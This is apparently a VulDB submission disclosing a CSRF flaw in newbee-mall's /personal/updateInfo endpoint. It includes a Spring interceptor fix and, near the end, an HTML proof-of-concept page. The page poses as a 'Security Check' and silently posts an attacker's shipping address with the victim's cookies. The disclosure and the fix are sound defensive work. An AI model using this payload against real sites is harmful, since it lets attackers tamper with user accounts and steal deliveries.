**Title**: newbee-ltd newbee-mall v1.0 CSRF

**Description**:

# CSRF Vulnerability in Personal Information Update
## Summary
A **CSRF vulnerability** exists in the personal information update endpoint `/personal/updateInfo`. Because the endpoint is guarded only by the session cookie, any page a logged-in user visits can submit the request on their behalf. Attackers can modify users' personal information including shipping addresses, potentially redirecting deliveries to attacker-controlled locations.
## Vulnerability Details
### Configuration-Level Issue
**File**: `src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java`
```java
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.servlet.config.annotation.InterceptorRegistry;
import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;

@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {

    @Autowired
    private NewBeeMallLoginInterceptor newBeeMallLoginInterceptor; // project-internal session login check

    @Override
    public void addInterceptors(InterceptorRegistry registry) {
        registry.addInterceptor(newBeeMallLoginInterceptor)
                .addPathPatterns("/personal/updateInfo");
        // ❌ Only authentication check, no CSRF protection
    }
}
```
### Endpoint-Level Code Analysis
Based on project structure, the personal information update endpoint likely follows this pattern:
```java
@PostMapping("/personal/updateInfo")
@ResponseBody
public Result updateUserInfo(@RequestBody MallUser mallUser, HttpSession httpSession) {
    NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
    // ❌ No CSRF token validation
    // ⚠️ Allows modification of sensitive user data including address
    mallUser.setUserId(user.getUserId());
    return mallUserService.updateUserInfo(mallUser);
}
```
**Security Issues**:
1. ❌ No CSRF token validation
2. ⚠️ Can modify shipping address to attacker's location
3. ⚠️ Combined with order CSRF, enables complete delivery hijacking
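One way to close this gap, as an added example that is not newbee-mall's own code: a Spring `HandlerInterceptor` that rejects cross-site state-changing requests by checking the `Origin`/`Referer` header and a per-session synchronizer token. The class, the `CSRF_TOKEN` session attribute and the `X-CSRF-TOKEN` header name are assumptions, as is a Spring Boot 2.x (`javax.servlet`) and Java 11+ environment.

```java
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;
import java.util.Set;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import org.springframework.web.servlet.HandlerInterceptor;
// Hypothetical interceptor, not newbee-mall's own code. State-changing requests must
// come from a trusted Origin/Referer AND echo the session's synchronizer token in
// X-CSRF-TOKEN; a page on another origin can neither read nor forge that token.
public class CsrfInterceptor implements HandlerInterceptor {
    static final String TOKEN_ATTR = "CSRF_TOKEN";      // session attribute name (assumed)
    static final String TOKEN_HEADER = "X-CSRF-TOKEN";  // request header name (assumed)
    private static final Set<String> SAFE_METHODS = Set.of("GET", "HEAD", "OPTIONS");
    private final Set<String> trustedOrigins;           // e.g. "http://localhost:28089"
    public CsrfInterceptor(Set<String> trustedOrigins) { this.trustedOrigins = trustedOrigins; }
    // Token the server-rendered page embeds so its own fetch() calls can send it back.
    public static String tokenFor(HttpSession session) {
        synchronized (session) {
            String token = (String) session.getAttribute(TOKEN_ATTR);
            if (token == null) {
                byte[] raw = new byte[32];
                new SecureRandom().nextBytes(raw);
                token = Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
                session.setAttribute(TOKEN_ATTR, token);
            }
            return token;
        }
    }
    @Override
    public boolean preHandle(HttpServletRequest req, HttpServletResponse resp, Object handler)
            throws Exception {
        if (SAFE_METHODS.contains(req.getMethod())) return true;
        // Browsers always attach Origin to cross-site fetch() POSTs, so the PoC above fails here.
        String origin = req.getHeader("Origin"), referer = req.getHeader("Referer");
        boolean originOk = origin != null ? trustedOrigins.contains(origin)
                : referer != null && trustedOrigins.stream().anyMatch(t -> referer.startsWith(t + "/"));
        // Synchronizer token: constant-time comparison against the value stored in the session.
        HttpSession session = req.getSession(false);
        String expected = session == null ? null : (String) session.getAttribute(TOKEN_ATTR);
        String actual = req.getHeader(TOKEN_HEADER);
        boolean tokenOk = expected != null && actual != null
                && MessageDigest.isEqual(expected.getBytes(), actual.getBytes());
        if (originOk && tokenOk) return true;
        resp.sendError(HttpServletResponse.SC_FORBIDDEN, "cross-site request rejected");
        return false;
    }
}
```

Register it in `NeeBeeMallWebMvcConfigurer.addInterceptors` on the same `/personal/updateInfo` pattern as the login interceptor, and render `CsrfInterceptor.tokenFor(session)` into the page so the legitimate frontend can send the header. Marking the session cookie `SameSite=Lax` or `Strict` adds an independent second layer.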
## Proof of Concept (PoC)
```html
<!DOCTYPE html>
<html>
<head>
  <title>Profile Verification Required</title>
</head>
<body>
  <h2>Security Check: Verify Your Information</h2>
  <p>We're updating our security settings. Please verify your account...</p>
  <script>
    // Modify user's shipping address
    fetch('http://localhost:28089/personal/updateInfo', {
      method: 'POST',
      credentials: 'include',
      headers: {
        'Content-Type': 'application/json'
      },
      body: JSON.stringify({
        nickName: 'User',
        introduceSign: 'Normal user',
        address: '123 Attacker Street, Hacker City, 99999', // Attacker's address
        // Other user fields remain unchanged
      })
    })
    .then(response => response.json())
    .then(data => {
      document.body.innerHTML = '<h3>✅ Verification complete! Thank you.</h3>';
    });
  </script>
</body>
</html>
```
## Impact
**User information tampering and delivery hijacking** - Attackers can redirect product deliveries to their own addresses, leading to theft and financial loss for users.
---
**CVSS Score**: 7.3 (High)
**Source**: https://github.com/newbee-ltd/newbee-mall/issues/114

**User**: flashzyc (UID 92850)

**Submission**: 02/05/2026 11:59 (4 months ago)

**Moderation**: 02/18/2026 07:56 (13 days later)

**Status**: Duplicate

**VulDB entry**: 346456 [newbee-ltd newbee-mall up to a069069b07027613bf0e7f571736be86f431faee Multiple Endpoints cross-site request forgery]

**Points**: 0